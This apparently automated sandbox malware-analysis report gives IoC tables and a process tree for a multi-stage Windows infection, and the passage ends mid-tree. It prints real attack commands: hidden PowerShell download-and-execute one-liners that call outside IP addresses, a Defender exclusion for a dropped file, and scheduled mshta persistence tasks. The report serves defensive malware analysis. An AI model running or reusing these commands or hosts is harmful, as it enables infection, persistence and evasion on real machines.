2180	powershell.exe
3924	powershell.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
4024	powershell.exe
4024	powershell.exe
4024	powershell.exe
3068	powershell.exe
3068	powershell.exe
3068	powershell.exe
4408	rapes.exe
4408	rapes.exe
4924	wtrpqgw.exe
4924	wtrpqgw.exe
1820	2b7df62c2f.exe
1820	2b7df62c2f.exe
4848	483d2fa8a0d53818306efeb32d3.exe
4848	483d2fa8a0d53818306efeb32d3.exe
3944	powershell.exe
3944	powershell.exe
3944	powershell.exe
428	5106e5bbdb.exe
428	5106e5bbdb.exe
428	5106e5bbdb.exe
428	5106e5bbdb.exe
2856	feda7c9ffa.exe
2856	feda7c9ffa.exe
3368	Explorer.EXE
3368	Explorer.EXE
2232	03eec02af1.exe
2232	03eec02af1.exe
2232	03eec02af1.exe
2232	03eec02af1.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

description	pid	Process
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	3452	chromium.exe
Token: SeDebugPrivilege	4860	ce4pMzk.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	1372	cnntXtU.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	3924	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeDebugPrivilege	3836	5106e5bbdb.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeLockMemoryPrivilege	4384	notepad.exe
Token: SeLockMemoryPrivilege	4384	notepad.exe
Token: SeDebugPrivilege	2264	tasklist.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeDebugPrivilege	3080	tasklist.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeDebugPrivilege	4456	taskkill.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeDebugPrivilege	2944	taskkill.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeDebugPrivilege	388	taskkill.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeDebugPrivilege	4156	taskkill.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeDebugPrivilege	4588	taskkill.exe
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeShutdownPrivilege	3368	Explorer.EXE
Token: SeCreatePagefilePrivilege	3368	Explorer.EXE
Token: SeDebugPrivilege	3168	firefox.exe
Token: SeDebugPrivilege	3168	firefox.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
2256	99878a5969.exe
2256	99878a5969.exe
2256	99878a5969.exe
4384	notepad.exe
4116	a6f3c10671.exe
3368	Explorer.EXE
3368	Explorer.EXE
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
4116	a6f3c10671.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
4116	a6f3c10671.exe

Suspicious use of SendNotifyMessage 36 IoCs

pid	Process
3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
2256	99878a5969.exe
2256	99878a5969.exe
2256	99878a5969.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
4116	a6f3c10671.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
4116	a6f3c10671.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
3168	firefox.exe
4116	a6f3c10671.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1372	cnntXtU.exe
3168	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3160 wrote to memory of 432	3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe	85
PID 3160 wrote to memory of 432	3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe	85
PID 3160 wrote to memory of 432	3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe	85
PID 3160 wrote to memory of 2964	3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe	86
PID 3160 wrote to memory of 2964	3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe	86
PID 3160 wrote to memory of 2964	3160	19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe	86
PID 432 wrote to memory of 1208	432	cmd.exe	88
PID 432 wrote to memory of 1208	432	cmd.exe	88
PID 432 wrote to memory of 1208	432	cmd.exe	88
PID 2964 wrote to memory of 2096	2964	mshta.exe	90
PID 2964 wrote to memory of 2096	2964	mshta.exe	90
PID 2964 wrote to memory of 2096	2964	mshta.exe	90
PID 2096 wrote to memory of 2636	2096	powershell.exe	101
PID 2096 wrote to memory of 2636	2096	powershell.exe	101
PID 2096 wrote to memory of 2636	2096	powershell.exe	101
PID 2636 wrote to memory of 5068	2636	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE	102
PID 2636 wrote to memory of 5068	2636	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE	102
PID 2636 wrote to memory of 5068	2636	TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE	102
PID 5068 wrote to memory of 2184	5068	rapes.exe	118
PID 5068 wrote to memory of 2184	5068	rapes.exe	118
PID 2184 wrote to memory of 3452	2184	SvhQA35.exe	120
PID 2184 wrote to memory of 3452	2184	SvhQA35.exe	120
PID 5068 wrote to memory of 4860	5068	rapes.exe	121
PID 5068 wrote to memory of 4860	5068	rapes.exe	121
PID 5068 wrote to memory of 1724	5068	rapes.exe	122
PID 5068 wrote to memory of 1724	5068	rapes.exe	122
PID 1724 wrote to memory of 1124	1724	PcAIvJ0.exe	123
PID 1724 wrote to memory of 1124	1724	PcAIvJ0.exe	123
PID 1124 wrote to memory of 2056	1124	cmd.exe	125
PID 1124 wrote to memory of 2056	1124	cmd.exe	125
PID 5068 wrote to memory of 644	5068	rapes.exe	126
PID 5068 wrote to memory of 644	5068	rapes.exe	126
PID 5068 wrote to memory of 644	5068	rapes.exe	126
PID 644 wrote to memory of 3580	644	nhDLtPT.exe	127
PID 644 wrote to memory of 3580	644	nhDLtPT.exe	127
PID 644 wrote to memory of 3580	644	nhDLtPT.exe	127
PID 5068 wrote to memory of 1372	5068	rapes.exe	128
PID 5068 wrote to memory of 1372	5068	rapes.exe	128
PID 3580 wrote to memory of 2400	3580	Gxtuum.exe	129
PID 3580 wrote to memory of 2400	3580	Gxtuum.exe	129
PID 3580 wrote to memory of 2400	3580	Gxtuum.exe	129
PID 5068 wrote to memory of 2256	5068	rapes.exe	130
PID 5068 wrote to memory of 2256	5068	rapes.exe	130
PID 5068 wrote to memory of 2256	5068	rapes.exe	130
PID 2256 wrote to memory of 4456	2256	99878a5969.exe	131
PID 2256 wrote to memory of 4456	2256	99878a5969.exe	131
PID 2256 wrote to memory of 4456	2256	99878a5969.exe	131
PID 2256 wrote to memory of 2264	2256	99878a5969.exe	132
PID 2256 wrote to memory of 2264	2256	99878a5969.exe	132
PID 2256 wrote to memory of 2264	2256	99878a5969.exe	132
PID 4456 wrote to memory of 1292	4456	cmd.exe	134
PID 4456 wrote to memory of 1292	4456	cmd.exe	134
PID 4456 wrote to memory of 1292	4456	cmd.exe	134
PID 2264 wrote to memory of 1588	2264	mshta.exe	135
PID 2264 wrote to memory of 1588	2264	mshta.exe	135
PID 2264 wrote to memory of 1588	2264	mshta.exe	135
PID 5068 wrote to memory of 2856	5068	rapes.exe	137
PID 5068 wrote to memory of 2856	5068	rapes.exe	137
PID 5068 wrote to memory of 2856	5068	rapes.exe	137
PID 2856 wrote to memory of 2620	2856	cmd.exe	139
PID 2856 wrote to memory of 2620	2856	cmd.exe	139
PID 2856 wrote to memory of 2620	2856	cmd.exe	139
PID 2056 wrote to memory of 3924	2056	powershell.exe	140
PID 2056 wrote to memory of 3924	2056	powershell.exe	140

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3368
- C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
  "C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn XeMacmaJDcd /tr "mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:432
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn XeMacmaJDcd /tr "mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:1208
- - C:\Windows\SysWOW64\mshta.exe
    mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2096
    - - C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
        
        "C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2636
      - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe
        
        C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\xLUFfgfR\Anubis.exe""
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1724
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C251.tmp\C252.tmp\C253.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3924
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgq0aj3o\zgq0aj3o.cmdline"
        11⤵
        
        PID:100
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES119A.tmp" "c:\Users\Admin\AppData\Local\Temp\zgq0aj3o\CSCF0F5354ECBDC4CB8ABF25013C7A2A43.TMP"
        12⤵
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:644
        
        C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
        8⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3580
        
        C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
        
        "C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
        7⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2256
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn cS853maNMMf /tr "mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4456
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn cS853maNMMf /tr "mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta" /sc minute /mo 25 /ru "Admin" /f
        9⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1292
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
        
        "C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE"
        10⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2856
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2620
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4024
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "TYIbymaKsFJ" /tr "mshta \"C:\Temp\Y3xqvQ15g.hta\"" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1452
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\Y3xqvQ15g.hta"
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        9⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        10⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1820
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        8⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3836
        
        C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:428
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 812
        8⤵
        Program crash
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2856
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        8⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
